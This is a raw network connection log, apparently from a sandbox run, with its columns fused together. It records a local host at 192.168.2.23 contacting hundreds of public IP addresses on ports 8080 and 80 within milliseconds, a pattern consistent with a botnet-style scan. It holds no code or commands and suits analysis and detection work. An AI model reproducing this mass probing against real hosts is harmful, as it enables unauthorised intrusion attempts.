                                                              Nov 13, 2023 22:17:59.739406109 CET139488080192.168.2.2395.76.63.11
                                                              Nov 13, 2023 22:17:59.739411116 CET1343680192.168.2.2388.45.50.225
                                                              Nov 13, 2023 22:17:59.739422083 CET139488080192.168.2.2385.24.116.203
                                                              Nov 13, 2023 22:17:59.739442110 CET139488080192.168.2.2385.93.103.215
                                                              Nov 13, 2023 22:17:59.739443064 CET1343680192.168.2.2388.243.246.236
                                                              Nov 13, 2023 22:17:59.739442110 CET139488080192.168.2.2331.145.242.121
                                                              Nov 13, 2023 22:17:59.739443064 CET139488080192.168.2.2394.236.203.125
                                                              Nov 13, 2023 22:17:59.739454985 CET139488080192.168.2.2331.69.152.197
                                                              Nov 13, 2023 22:17:59.739456892 CET1343680192.168.2.2388.254.147.71
                                                              Nov 13, 2023 22:17:59.739463091 CET139488080192.168.2.2331.35.45.222
                                                              Nov 13, 2023 22:17:59.739463091 CET139488080192.168.2.2331.28.30.47
                                                              Nov 13, 2023 22:17:59.739464045 CET139488080192.168.2.2395.187.114.232
                                                              Nov 13, 2023 22:17:59.739464998 CET139488080192.168.2.2362.55.75.115
                                                              Nov 13, 2023 22:17:59.739480019 CET139488080192.168.2.2385.44.52.116
                                                              Nov 13, 2023 22:17:59.739486933 CET1343680192.168.2.2388.202.135.114
                                                              Nov 13, 2023 22:17:59.739489079 CET139488080192.168.2.2362.112.249.217
                                                              Nov 13, 2023 22:17:59.739489079 CET139488080192.168.2.2385.51.174.101
                                                              Nov 13, 2023 22:17:59.739502907 CET139488080192.168.2.2385.7.39.101
                                                              Nov 13, 2023 22:17:59.739505053 CET139488080192.168.2.2331.213.241.10
                                                              Nov 13, 2023 22:17:59.739505053 CET139488080192.168.2.2395.35.15.26
                                                              Nov 13, 2023 22:17:59.739507914 CET139488080192.168.2.2394.221.137.174
                                                              Nov 13, 2023 22:17:59.739507914 CET1343680192.168.2.2388.38.84.3
                                                              Nov 13, 2023 22:17:59.739512920 CET139488080192.168.2.2362.28.103.156
                                                              Nov 13, 2023 22:17:59.739512920 CET139488080192.168.2.2395.108.20.109
                                                              Nov 13, 2023 22:17:59.739516020 CET139488080192.168.2.2394.230.195.43
                                                              Nov 13, 2023 22:17:59.739528894 CET139488080192.168.2.2331.182.239.219
                                                              Nov 13, 2023 22:17:59.739528894 CET139488080192.168.2.2395.230.235.236
                                                              Nov 13, 2023 22:17:59.739528894 CET139488080192.168.2.2362.178.152.228
                                                              Nov 13, 2023 22:17:59.739528894 CET139488080192.168.2.2362.147.51.7
                                                              Nov 13, 2023 22:17:59.739531994 CET139488080192.168.2.2385.99.135.33
                                                              Nov 13, 2023 22:17:59.739535093 CET1343680192.168.2.2388.182.190.48
                                                              Nov 13, 2023 22:17:59.739540100 CET139488080192.168.2.2394.4.233.17
                                                              Nov 13, 2023 22:17:59.739540100 CET139488080192.168.2.2331.64.185.73
                                                              Nov 13, 2023 22:17:59.739553928 CET1343680192.168.2.2388.216.129.247
                                                              Nov 13, 2023 22:17:59.739558935 CET139488080192.168.2.2385.53.138.30
                                                              Nov 13, 2023 22:17:59.739561081 CET139488080192.168.2.2394.75.221.71
                                                              Nov 13, 2023 22:17:59.739563942 CET139488080192.168.2.2395.90.10.91
                                                              Nov 13, 2023 22:17:59.739563942 CET139488080192.168.2.2395.190.105.187
                                                              Nov 13, 2023 22:17:59.739569902 CET1343680192.168.2.2388.163.220.121
                                                              Nov 13, 2023 22:17:59.739571095 CET139488080192.168.2.2395.97.253.38
                                                              Nov 13, 2023 22:17:59.739571095 CET139488080192.168.2.2385.217.250.34
                                                              Nov 13, 2023 22:17:59.739584923 CET1343680192.168.2.2388.8.142.245
                                                              Nov 13, 2023 22:17:59.739586115 CET139488080192.168.2.2394.135.24.58
                                                              Nov 13, 2023 22:17:59.739590883 CET139488080192.168.2.2395.91.17.189
                                                              Nov 13, 2023 22:17:59.739590883 CET139488080192.168.2.2394.241.122.19
                                                              Nov 13, 2023 22:17:59.739595890 CET139488080192.168.2.2394.78.47.220
                                                              Nov 13, 2023 22:17:59.739600897 CET139488080192.168.2.2385.220.164.11
                                                              Nov 13, 2023 22:17:59.739608049 CET1343680192.168.2.2388.161.36.121
                                                              Nov 13, 2023 22:17:59.739612103 CET139488080192.168.2.2395.124.47.30
                                                              Nov 13, 2023 22:17:59.739613056 CET139488080192.168.2.2385.139.61.114
                                                              Nov 13, 2023 22:17:59.739623070 CET139488080192.168.2.2362.209.216.42
                                                              Nov 13, 2023 22:17:59.739636898 CET139488080192.168.2.2395.104.19.86
                                                              Nov 13, 2023 22:17:59.739638090 CET139488080192.168.2.2331.3.9.85
                                                              Nov 13, 2023 22:17:59.739638090 CET1343680192.168.2.2388.147.227.115
                                                              Nov 13, 2023 22:17:59.739638090 CET139488080192.168.2.2331.75.229.17
                                                              Nov 13, 2023 22:17:59.739639044 CET139488080192.168.2.2394.107.130.19
                                                              Nov 13, 2023 22:17:59.739645958 CET139488080192.168.2.2394.43.181.196
                                                              Nov 13, 2023 22:17:59.739660025 CET1343680192.168.2.2388.20.60.48
                                                              Nov 13, 2023 22:17:59.739666939 CET139488080192.168.2.2394.4.166.200
                                                              Nov 13, 2023 22:17:59.739666939 CET139488080192.168.2.2385.216.67.61
                                                              Nov 13, 2023 22:17:59.739669085 CET139488080192.168.2.2394.0.143.140
                                                              Nov 13, 2023 22:17:59.739669085 CET139488080192.168.2.2394.119.176.78
                                                              Nov 13, 2023 22:17:59.739674091 CET139488080192.168.2.2362.46.67.84
                                                              Nov 13, 2023 22:17:59.739675045 CET139488080192.168.2.2385.41.76.157
                                                              Nov 13, 2023 22:17:59.739676952 CET139488080192.168.2.2395.35.18.87
                                                              Nov 13, 2023 22:17:59.739676952 CET139488080192.168.2.2331.131.203.9
                                                              Nov 13, 2023 22:17:59.739696980 CET139488080192.168.2.2331.94.90.235
                                                              Nov 13, 2023 22:17:59.739696980 CET1343680192.168.2.2388.87.201.250
                                                              Nov 13, 2023 22:17:59.739697933 CET139488080192.168.2.2362.51.132.62
                                                              Nov 13, 2023 22:17:59.739703894 CET139488080192.168.2.2385.246.180.247
                                                              Nov 13, 2023 22:17:59.739706993 CET1343680192.168.2.2388.129.179.95
                                                              Nov 13, 2023 22:17:59.739716053 CET139488080192.168.2.2385.205.250.136
                                                              Nov 13, 2023 22:17:59.739725113 CET139488080192.168.2.2395.9.134.73
                                                              Nov 13, 2023 22:17:59.739727020 CET139488080192.168.2.2385.73.206.202
                                                              Nov 13, 2023 22:17:59.739727020 CET139488080192.168.2.2395.57.41.210
                                                              Nov 13, 2023 22:17:59.739741087 CET139488080192.168.2.2385.197.16.14
                                                              Nov 13, 2023 22:17:59.739744902 CET139488080192.168.2.2385.103.0.66
                                                              Nov 13, 2023 22:17:59.739748955 CET139488080192.168.2.2385.36.158.174
                                                              Nov 13, 2023 22:17:59.739757061 CET139488080192.168.2.2362.146.248.42
                                                              Nov 13, 2023 22:17:59.739759922 CET1343680192.168.2.2388.35.215.145
                                                              Nov 13, 2023 22:17:59.739759922 CET139488080192.168.2.2385.247.100.116
                                                              Nov 13, 2023 22:17:59.739763975 CET139488080192.168.2.2362.240.75.221
                                                              Nov 13, 2023 22:17:59.739763975 CET139488080192.168.2.2395.166.218.18
                                                              Nov 13, 2023 22:17:59.739763975 CET1343680192.168.2.2388.242.205.34
                                                              Nov 13, 2023 22:17:59.739768028 CET139488080192.168.2.2394.255.151.20
                                                              Nov 13, 2023 22:17:59.739778042 CET139488080192.168.2.2385.147.44.21
                                                              Nov 13, 2023 22:17:59.739782095 CET139488080192.168.2.2395.233.39.217
                                                              Nov 13, 2023 22:17:59.739794016 CET1343680192.168.2.2388.140.113.53
                                                              Nov 13, 2023 22:17:59.739794016 CET139488080192.168.2.2362.62.208.68
                                                              Nov 13, 2023 22:17:59.739814997 CET1343680192.168.2.2388.114.24.83
                                                              Nov 13, 2023 22:17:59.739815950 CET139488080192.168.2.2395.145.46.222
                                                              Nov 13, 2023 22:17:59.739816904 CET139488080192.168.2.2395.241.186.144
                                                              Nov 13, 2023 22:17:59.739833117 CET1343680192.168.2.2388.173.84.114
                                                              Nov 13, 2023 22:17:59.739833117 CET139488080192.168.2.2385.240.250.209
                                                              Nov 13, 2023 22:17:59.739835024 CET139488080192.168.2.2394.238.230.46
                                                              Nov 13, 2023 22:17:59.739837885 CET1343680192.168.2.2388.229.237.188
                                                              Nov 13, 2023 22:17:59.739856958 CET139488080192.168.2.2385.147.127.131
                                                              Nov 13, 2023 22:17:59.739859104 CET139488080192.168.2.2362.222.248.202
                                                              Nov 13, 2023 22:17:59.739859104 CET139488080192.168.2.2331.39.174.33
                                                              Nov 13, 2023 22:17:59.739859104 CET139488080192.168.2.2394.241.51.232
                                                              Nov 13, 2023 22:17:59.739859104 CET139488080192.168.2.2331.233.119.195
                                                              Nov 13, 2023 22:17:59.739864111 CET139488080192.168.2.2395.229.53.184
                                                              Nov 13, 2023 22:17:59.739864111 CET139488080192.168.2.2362.100.250.196
                                                              Nov 13, 2023 22:17:59.739873886 CET139488080192.168.2.2331.113.236.53
                                                              Nov 13, 2023 22:17:59.739885092 CET1343680192.168.2.2388.59.47.54
                                                              Nov 13, 2023 22:17:59.739886999 CET139488080192.168.2.2394.80.108.30
                                                              Nov 13, 2023 22:17:59.739886045 CET139488080192.168.2.2385.241.175.125
                                                              Nov 13, 2023 22:17:59.739886999 CET139488080192.168.2.2395.128.153.19
                                                              Nov 13, 2023 22:17:59.739900112 CET1343680192.168.2.2388.125.150.148
                                                              Nov 13, 2023 22:17:59.739903927 CET139488080192.168.2.2385.138.241.239
                                                              Nov 13, 2023 22:17:59.739906073 CET139488080192.168.2.2385.189.52.146
                                                              Nov 13, 2023 22:17:59.739906073 CET139488080192.168.2.2385.76.49.123
                                                              Nov 13, 2023 22:17:59.739911079 CET139488080192.168.2.2362.213.61.222
                                                              Nov 13, 2023 22:17:59.739911079 CET1343680192.168.2.2388.113.159.67
                                                              Nov 13, 2023 22:17:59.739911079 CET139488080192.168.2.2331.161.218.229
                                                              Nov 13, 2023 22:17:59.739922047 CET139488080192.168.2.2331.206.47.28
                                                              Nov 13, 2023 22:17:59.739924908 CET1343680192.168.2.2388.139.0.221
                                                              Nov 13, 2023 22:17:59.739939928 CET139488080192.168.2.2394.70.234.86
                                                              Nov 13, 2023 22:17:59.739939928 CET139488080192.168.2.2394.98.176.182
                                                              Nov 13, 2023 22:17:59.739942074 CET139488080192.168.2.2395.205.147.208
                                                              Nov 13, 2023 22:17:59.739953995 CET139488080192.168.2.2385.201.57.50
                                                              Nov 13, 2023 22:17:59.739953995 CET1343680192.168.2.2388.242.115.24
                                                              Nov 13, 2023 22:17:59.739953995 CET139488080192.168.2.2362.123.37.199
                                                              Nov 13, 2023 22:17:59.739967108 CET139488080192.168.2.2385.58.159.55
                                                              Nov 13, 2023 22:17:59.739968061 CET1343680192.168.2.2388.17.113.141
                                                              Nov 13, 2023 22:17:59.739970922 CET139488080192.168.2.2385.44.240.188
                                                              Nov 13, 2023 22:17:59.739974022 CET139488080192.168.2.2362.106.225.25
                                                              Nov 13, 2023 22:17:59.739983082 CET139488080192.168.2.2385.182.51.104
                                                              Nov 13, 2023 22:17:59.739984035 CET1343680192.168.2.2388.145.35.86
                                                              Nov 13, 2023 22:17:59.739994049 CET139488080192.168.2.2395.154.9.187
                                                              Nov 13, 2023 22:17:59.739995956 CET139488080192.168.2.2362.210.128.224
                                                              Nov 13, 2023 22:17:59.740010977 CET139488080192.168.2.2385.60.29.250
                                                              Nov 13, 2023 22:17:59.740015984 CET139488080192.168.2.2331.191.151.144
                                                              Nov 13, 2023 22:17:59.740017891 CET1343680192.168.2.2388.242.192.66
                                                              Nov 13, 2023 22:17:59.740036011 CET139488080192.168.2.2331.54.45.19
                                                              Nov 13, 2023 22:17:59.740036964 CET139488080192.168.2.2331.179.235.99
                                                              Nov 13, 2023 22:17:59.740036964 CET139488080192.168.2.2362.125.210.35
                                                              Nov 13, 2023 22:17:59.740041018 CET139488080192.168.2.2362.139.212.32
                                                              Nov 13, 2023 22:17:59.740042925 CET139488080192.168.2.2395.154.115.206
                                                              Nov 13, 2023 22:17:59.740058899 CET139488080192.168.2.2362.250.233.149
                                                              Nov 13, 2023 22:17:59.740058899 CET139488080192.168.2.2362.106.133.111
                                                              Nov 13, 2023 22:17:59.740061998 CET139488080192.168.2.2394.193.10.188
                                                              Nov 13, 2023 22:17:59.740067005 CET1343680192.168.2.2388.12.22.242
                                                              Nov 13, 2023 22:17:59.740077019 CET139488080192.168.2.2394.147.197.56
                                                              Nov 13, 2023 22:17:59.740077972 CET139488080192.168.2.2395.231.197.31
                                                              Nov 13, 2023 22:17:59.740092039 CET139488080192.168.2.2385.189.64.79
                                                              Nov 13, 2023 22:17:59.740092039 CET1343680192.168.2.2388.5.34.188
                                                              Nov 13, 2023 22:17:59.740092993 CET139488080192.168.2.2394.228.16.71
                                                              Nov 13, 2023 22:17:59.740092993 CET139488080192.168.2.2385.28.39.11
                                                              Nov 13, 2023 22:17:59.740099907 CET139488080192.168.2.2395.26.226.244
                                                              Nov 13, 2023 22:17:59.740102053 CET139488080192.168.2.2395.110.58.135
                                                              Nov 13, 2023 22:17:59.740102053 CET139488080192.168.2.2331.99.235.199
                                                              Nov 13, 2023 22:17:59.740107059 CET139488080192.168.2.2395.52.221.205
                                                              Nov 13, 2023 22:17:59.740108967 CET139488080192.168.2.2331.69.61.129
                                                              Nov 13, 2023 22:17:59.740118027 CET139488080192.168.2.2394.190.144.125
                                                              Nov 13, 2023 22:17:59.740118980 CET139488080192.168.2.2395.14.205.186
                                                              Nov 13, 2023 22:17:59.740118980 CET139488080192.168.2.2331.195.119.36
                                                              Nov 13, 2023 22:17:59.740128994 CET139488080192.168.2.2385.92.16.46
                                                              Nov 13, 2023 22:17:59.740140915 CET139488080192.168.2.2395.237.53.120
                                                              Nov 13, 2023 22:17:59.740142107 CET1343680192.168.2.2388.160.106.241
                                                              Nov 13, 2023 22:17:59.740142107 CET139488080192.168.2.2394.222.93.120
                                                              Nov 13, 2023 22:17:59.740147114 CET139488080192.168.2.2362.45.189.213
                                                              Nov 13, 2023 22:17:59.740147114 CET139488080192.168.2.2331.130.56.56
                                                              Nov 13, 2023 22:17:59.740147114 CET139488080192.168.2.2394.99.32.36
                                                              Nov 13, 2023 22:17:59.740163088 CET139488080192.168.2.2362.51.25.14
                                                              Nov 13, 2023 22:17:59.740164042 CET1343680192.168.2.2388.144.142.63
                                                              Nov 13, 2023 22:17:59.740165949 CET139488080192.168.2.2362.161.101.154
                                                              Nov 13, 2023 22:17:59.740168095 CET139488080192.168.2.2385.23.149.253
                                                              Nov 13, 2023 22:17:59.740175009 CET139488080192.168.2.2394.192.211.174
                                                              Nov 13, 2023 22:17:59.740190029 CET139488080192.168.2.2395.60.172.25
                                                              Nov 13, 2023 22:17:59.740194082 CET1343680192.168.2.2388.254.209.173
                                                              Nov 13, 2023 22:17:59.740205050 CET139488080192.168.2.2385.150.20.44
                                                              Nov 13, 2023 22:17:59.740204096 CET139488080192.168.2.2331.226.37.114
                                                              Nov 13, 2023 22:17:59.740211010 CET139488080192.168.2.2395.204.132.134
                                                              Nov 13, 2023 22:17:59.740211010 CET139488080192.168.2.2362.147.169.11
                                                              Nov 13, 2023 22:17:59.740211010 CET139488080192.168.2.2362.113.134.118
                                                              Nov 13, 2023 22:17:59.740212917 CET139488080192.168.2.2395.159.136.95
                                                              Nov 13, 2023 22:17:59.740211010 CET139488080192.168.2.2331.122.5.184
                                                              Nov 13, 2023 22:17:59.740212917 CET139488080192.168.2.2362.111.224.127
                                                              Nov 13, 2023 22:17:59.740211010 CET139488080192.168.2.2394.18.147.131
                                                              Nov 13, 2023 22:17:59.740211010 CET139488080192.168.2.2394.227.223.149
                                                              Nov 13, 2023 22:17:59.740215063 CET139488080192.168.2.2385.234.44.241
                                                              Nov 13, 2023 22:17:59.740215063 CET139488080192.168.2.2394.164.158.82
                                                              Nov 13, 2023 22:17:59.740211010 CET139488080192.168.2.2331.66.182.160
                                                              Nov 13, 2023 22:17:59.740233898 CET139488080192.168.2.2362.232.55.254
                                                              Nov 13, 2023 22:17:59.740238905 CET1343680192.168.2.2388.38.28.96
                                                              Nov 13, 2023 22:17:59.740238905 CET139488080192.168.2.2394.92.220.87
                                                              Nov 13, 2023 22:17:59.740243912 CET139488080192.168.2.2385.65.166.92
                                                              Nov 13, 2023 22:17:59.740247011 CET139488080192.168.2.2362.214.118.26
                                                              Nov 13, 2023 22:17:59.740247011 CET139488080192.168.2.2385.46.100.148
                                                              Nov 13, 2023 22:17:59.740247965 CET1343680192.168.2.2388.177.9.107
                                                              Nov 13, 2023 22:17:59.740261078 CET1343680192.168.2.2388.237.11.182
                                                              Nov 13, 2023 22:17:59.740261078 CET139488080192.168.2.2362.56.19.106
                                                              Nov 13, 2023 22:17:59.740263939 CET139488080192.168.2.2395.172.76.105
                                                              Nov 13, 2023 22:17:59.740263939 CET139488080192.168.2.2362.14.239.76
                                                              Nov 13, 2023 22:17:59.740266085 CET139488080192.168.2.2385.185.114.149
                                                              Nov 13, 2023 22:17:59.740266085 CET139488080192.168.2.2395.199.13.138
                                                              Nov 13, 2023 22:17:59.740267992 CET139488080192.168.2.2394.145.228.102
                                                              Nov 13, 2023 22:17:59.740281105 CET1343680192.168.2.2388.237.132.214
                                                              Nov 13, 2023 22:17:59.740288019 CET139488080192.168.2.2331.212.242.0
                                                              Nov 13, 2023 22:17:59.740288973 CET139488080192.168.2.2362.190.107.62
                                                              Nov 13, 2023 22:17:59.740295887 CET139488080192.168.2.2385.18.226.164
                                                              Nov 13, 2023 22:17:59.740300894 CET1343680192.168.2.2388.54.82.217
                                                              Nov 13, 2023 22:17:59.740305901 CET139488080192.168.2.2395.69.141.18
                                                              Nov 13, 2023 22:17:59.740309000 CET139488080192.168.2.2395.150.61.166
                                                              Nov 13, 2023 22:17:59.740317106 CET139488080192.168.2.2362.153.249.10
                                                              Nov 13, 2023 22:17:59.740318060 CET139488080192.168.2.2395.78.42.157
                                                              Nov 13, 2023 22:17:59.740318060 CET1343680192.168.2.2388.86.31.239
                                                              Nov 13, 2023 22:17:59.740334034 CET139488080192.168.2.2394.138.174.127
                                                              Nov 13, 2023 22:17:59.740340948 CET139488080192.168.2.2331.24.144.29
                                                              Nov 13, 2023 22:17:59.740340948 CET139488080192.168.2.2331.243.253.18
                                                              Nov 13, 2023 22:17:59.740340948 CET139488080192.168.2.2385.103.188.44
                                                              Nov 13, 2023 22:17:59.740340948 CET139488080192.168.2.2395.220.21.16
                                                              Nov 13, 2023 22:17:59.740343094 CET139488080192.168.2.2385.184.240.127
                                                              Nov 13, 2023 22:17:59.740346909 CET139488080192.168.2.2394.207.132.181
                                                              Nov 13, 2023 22:17:59.740353107 CET139488080192.168.2.2362.105.217.122
                                                              Nov 13, 2023 22:17:59.740361929 CET1343680192.168.2.2388.90.128.71
                                                              Nov 13, 2023 22:17:59.740364075 CET139488080192.168.2.2385.14.153.88
                                                              Nov 13, 2023 22:17:59.740364075 CET139488080192.168.2.2362.185.106.90
                                                              Nov 13, 2023 22:17:59.740366936 CET139488080192.168.2.2362.203.29.209
                                                              Nov 13, 2023 22:17:59.740377903 CET139488080192.168.2.2395.52.58.170
                                                              Nov 13, 2023 22:17:59.740377903 CET139488080192.168.2.2362.162.56.104
                                                              Nov 13, 2023 22:17:59.740377903 CET139488080192.168.2.2395.29.28.39
                                                              Nov 13, 2023 22:17:59.740391970 CET139488080192.168.2.2394.80.22.29
                                                              Nov 13, 2023 22:17:59.740396023 CET139488080192.168.2.2331.124.91.135
                                                              Nov 13, 2023 22:17:59.740396023 CET1343680192.168.2.2388.4.243.125
                                                              Nov 13, 2023 22:17:59.740396023 CET139488080192.168.2.2331.104.219.54
                                                              Nov 13, 2023 22:17:59.740397930 CET139488080192.168.2.2385.241.98.215
                                                              Nov 13, 2023 22:17:59.740397930 CET139488080192.168.2.2394.204.160.218
                                                              Nov 13, 2023 22:17:59.740401983 CET139488080192.168.2.2385.140.51.123
                                                              Nov 13, 2023 22:17:59.740412951 CET139488080192.168.2.2331.233.198.115
                                                              Nov 13, 2023 22:17:59.740415096 CET139488080192.168.2.2331.87.27.120
                                                              Nov 13, 2023 22:17:59.740415096 CET139488080192.168.2.2331.137.4.235
                                                              Nov 13, 2023 22:17:59.740430117 CET139488080192.168.2.2394.112.206.246
                                                              Nov 13, 2023 22:17:59.740432024 CET139488080192.168.2.2362.51.137.136
                                                              Nov 13, 2023 22:17:59.740433931 CET139488080192.168.2.2362.59.228.105
                                                              Nov 13, 2023 22:17:59.740448952 CET1343680192.168.2.2388.216.5.138
                                                              Nov 13, 2023 22:17:59.740454912 CET139488080192.168.2.2385.185.174.246
                                                              Nov 13, 2023 22:17:59.740454912 CET139488080192.168.2.2385.177.224.14
                                                              Nov 13, 2023 22:17:59.740458012 CET139488080192.168.2.2385.22.213.99
                                                              Nov 13, 2023 22:17:59.740462065 CET139488080192.168.2.2385.45.92.254
                                                              Nov 13, 2023 22:17:59.740463972 CET139488080192.168.2.2385.159.133.243
                                                              Nov 13, 2023 22:17:59.740463972 CET139488080192.168.2.2362.81.93.181
                                                              Nov 13, 2023 22:17:59.740468025 CET1343680192.168.2.2388.202.18.116
                                                              Nov 13, 2023 22:17:59.740468979 CET139488080192.168.2.2385.5.146.231
                                                              Nov 13, 2023 22:17:59.740473986 CET139488080192.168.2.2331.172.77.101
                                                              Nov 13, 2023 22:17:59.740477085 CET139488080192.168.2.2394.233.155.232
                                                              Nov 13, 2023 22:17:59.740482092 CET139488080192.168.2.2331.10.223.50
                                                              Nov 13, 2023 22:17:59.740483999 CET139488080192.168.2.2395.117.47.44
                                                              Nov 13, 2023 22:17:59.740489006 CET139488080192.168.2.2362.240.111.83
                                                              Nov 13, 2023 22:17:59.740500927 CET1343680192.168.2.2388.230.113.91
                                                              Nov 13, 2023 22:17:59.740503073 CET139488080192.168.2.2362.161.242.116
                                                              Nov 13, 2023 22:17:59.740503073 CET139488080192.168.2.2385.89.148.37
                                                              Nov 13, 2023 22:17:59.740511894 CET139488080192.168.2.2331.94.80.239
                                                              Nov 13, 2023 22:17:59.740519047 CET1343680192.168.2.2388.22.99.67
                                                              Nov 13, 2023 22:17:59.740531921 CET1343680192.168.2.2388.180.191.224
                                                              Nov 13, 2023 22:17:59.740533113 CET139488080192.168.2.2395.173.169.53
                                                              Nov 13, 2023 22:17:59.740531921 CET139488080192.168.2.2362.5.254.0
                                                              Nov 13, 2023 22:17:59.740534067 CET139488080192.168.2.2395.255.179.217
                                                              Nov 13, 2023 22:17:59.740547895 CET139488080192.168.2.2395.97.17.233
                                                              Nov 13, 2023 22:17:59.740547895 CET139488080192.168.2.2331.188.188.185
                                                              Nov 13, 2023 22:17:59.740555048 CET139488080192.168.2.2394.1.73.191
                                                              Nov 13, 2023 22:17:59.740555048 CET139488080192.168.2.2395.174.114.89
                                                              Nov 13, 2023 22:17:59.740566015 CET139488080192.168.2.2385.192.239.243
                                                              Nov 13, 2023 22:17:59.740575075 CET139488080192.168.2.2394.185.1.91
                                                              Nov 13, 2023 22:17:59.740585089 CET139488080192.168.2.2385.220.42.41
                                                              Nov 13, 2023 22:17:59.740586996 CET139488080192.168.2.2331.193.226.90
                                                              Nov 13, 2023 22:17:59.740588903 CET139488080192.168.2.2394.21.143.30
                                                              Nov 13, 2023 22:17:59.740597963 CET139488080192.168.2.2385.50.70.226
                                                              Nov 13, 2023 22:17:59.740602970 CET139488080192.168.2.2385.100.48.100
                                                              Nov 13, 2023 22:17:59.740617037 CET139488080192.168.2.2394.193.139.33
                                                              Nov 13, 2023 22:17:59.740618944 CET139488080192.168.2.2331.238.198.46
                                                              Nov 13, 2023 22:17:59.740631104 CET139488080192.168.2.2362.219.138.24
                                                              Nov 13, 2023 22:17:59.740631104 CET139488080192.168.2.2394.28.108.145
                                                              Nov 13, 2023 22:17:59.740636110 CET139488080192.168.2.2394.226.8.118
                                                              Nov 13, 2023 22:17:59.740643024 CET139488080192.168.2.2331.131.67.55
                                                              Nov 13, 2023 22:17:59.740645885 CET139488080192.168.2.2394.134.0.90
                                                              Nov 13, 2023 22:17:59.740648985 CET139488080192.168.2.2362.191.1.244
                                                              Nov 13, 2023 22:17:59.740659952 CET139488080192.168.2.2395.223.74.202
                                                              Nov 13, 2023 22:17:59.740665913 CET139488080192.168.2.2362.108.66.250
                                                              Nov 13, 2023 22:17:59.740674973 CET139488080192.168.2.2385.174.140.167
                                                              Nov 13, 2023 22:17:59.740680933 CET139488080192.168.2.2385.105.3.122
                                                              Nov 13, 2023 22:17:59.740686893 CET139488080192.168.2.2395.33.225.144
                                                              Nov 13, 2023 22:17:59.740690947 CET139488080192.168.2.2385.248.57.63
                                                              Nov 13, 2023 22:17:59.740701914 CET139488080192.168.2.2394.232.240.3
                                                              Nov 13, 2023 22:17:59.740706921 CET139488080192.168.2.2395.202.167.31
                                                              Nov 13, 2023 22:17:59.740721941 CET139488080192.168.2.2395.196.173.187
                                                              Nov 13, 2023 22:17:59.740725040 CET139488080192.168.2.2385.249.209.184
                                                              Nov 13, 2023 22:17:59.740725040 CET139488080192.168.2.2385.200.198.7
                                                              Nov 13, 2023 22:17:59.740730047 CET139488080192.168.2.2331.191.219.134
                                                              Nov 13, 2023 22:17:59.740746975 CET139488080192.168.2.2331.78.91.110
                                                              Nov 13, 2023 22:17:59.740747929 CET139488080192.168.2.2385.41.73.232
                                                              Nov 13, 2023 22:17:59.740748882 CET139488080192.168.2.2331.3.66.140
                                                              Nov 13, 2023 22:17:59.740748882 CET139488080192.168.2.2331.99.78.208
                                                              Nov 13, 2023 22:17:59.740763903 CET139488080192.168.2.2385.217.64.103
                                                              Nov 13, 2023 22:17:59.740765095 CET139488080192.168.2.2385.121.108.234
                                                              Nov 13, 2023 22:17:59.740776062 CET139488080192.168.2.2395.111.179.41
                                                              Nov 13, 2023 22:17:59.740777969 CET139488080192.168.2.2385.17.153.13
                                                              Nov 13, 2023 22:17:59.740778923 CET139488080192.168.2.2395.82.186.33
                                                              Nov 13, 2023 22:17:59.740791082 CET139488080192.168.2.2394.214.174.202
                                                              Nov 13, 2023 22:17:59.740792036 CET139488080192.168.2.2385.50.88.135
                                                              Nov 13, 2023 22:17:59.740802050 CET139488080192.168.2.2395.67.157.160
                                                              Nov 13, 2023 22:17:59.740811110 CET139488080192.168.2.2394.7.143.144
                                                              Nov 13, 2023 22:17:59.740813971 CET139488080192.168.2.2394.203.7.189
                                                              Nov 13, 2023 22:17:59.740824938 CET139488080192.168.2.2394.159.35.75
                                                              Nov 13, 2023 22:17:59.740832090 CET139488080192.168.2.2385.245.199.204
                                                              Nov 13, 2023 22:17:59.740834951 CET139488080192.168.2.2362.124.237.205
                                                              Nov 13, 2023 22:17:59.740844011 CET139488080192.168.2.2395.101.89.251
                                                              Nov 13, 2023 22:17:59.740852118 CET139488080192.168.2.2385.208.206.208
                                                              Nov 13, 2023 22:17:59.740854979 CET139488080192.168.2.2331.100.187.203
                                                              Nov 13, 2023 22:17:59.740861893 CET139488080192.168.2.2395.27.163.242
                                                              Nov 13, 2023 22:17:59.740876913 CET139488080192.168.2.2362.192.135.255
                                                              Nov 13, 2023 22:17:59.740880966 CET139488080192.168.2.2331.204.159.197
                                                              Nov 13, 2023 22:17:59.740880966 CET139488080192.168.2.2395.92.244.8
                                                              Nov 13, 2023 22:17:59.740892887 CET139488080192.168.2.2385.145.75.132
                                                              Nov 13, 2023 22:17:59.740904093 CET139488080192.168.2.2395.2.142.121
                                                              Nov 13, 2023 22:17:59.740912914 CET139488080192.168.2.2385.170.235.204
                                                              Nov 13, 2023 22:17:59.740919113 CET139488080192.168.2.2395.37.109.74
                                                              Nov 13, 2023 22:17:59.740922928 CET139488080192.168.2.2395.60.111.29
                                                              Nov 13, 2023 22:17:59.740932941 CET139488080192.168.2.2331.34.60.84
                                                              Nov 13, 2023 22:17:59.740935087 CET139488080192.168.2.2331.32.118.247
                                                              Nov 13, 2023 22:17:59.740936041 CET5645680192.168.2.2388.218.105.5
                                                              Nov 13, 2023 22:17:59.740937948 CET139488080192.168.2.2394.238.13.214
                                                              Nov 13, 2023 22:17:59.740937948 CET139488080192.168.2.2362.189.52.195
                                                              Nov 13, 2023 22:17:59.740938902 CET139488080192.168.2.2385.237.227.189
                                                              Nov 13, 2023 22:17:59.740952015 CET139488080192.168.2.2362.195.223.44
                                                              Nov 13, 2023 22:17:59.740957022 CET139488080192.168.2.2395.55.225.243
                                                              Nov 13, 2023 22:17:59.740962029 CET139488080192.168.2.2394.15.105.111
                                                              Nov 13, 2023 22:17:59.740971088 CET139488080192.168.2.2362.11.207.196
                                                              Nov 13, 2023 22:17:59.740993023 CET139488080192.168.2.2395.105.52.179
                                                              Nov 13, 2023 22:17:59.740994930 CET139488080192.168.2.2362.192.159.164
                                                              Nov 13, 2023 22:17:59.740997076 CET139488080192.168.2.2362.195.169.74
                                                              Nov 13, 2023 22:17:59.741012096 CET139488080192.168.2.2362.192.113.52
                                                              Nov 13, 2023 22:17:59.741014957 CET139488080192.168.2.2331.6.200.181
                                                              Nov 13, 2023 22:17:59.741018057 CET139488080192.168.2.2385.219.225.55
                                                              Nov 13, 2023 22:17:59.741018057 CET139488080192.168.2.2362.229.28.100
                                                              Nov 13, 2023 22:17:59.741019011 CET139488080192.168.2.2362.82.132.77
                                                              Nov 13, 2023 22:17:59.741019011 CET139488080192.168.2.2331.175.220.221
                                                              Nov 13, 2023 22:17:59.741019011 CET139488080192.168.2.2385.202.157.81
                                                              Nov 13, 2023 22:17:59.741022110 CET139488080192.168.2.2395.238.59.23
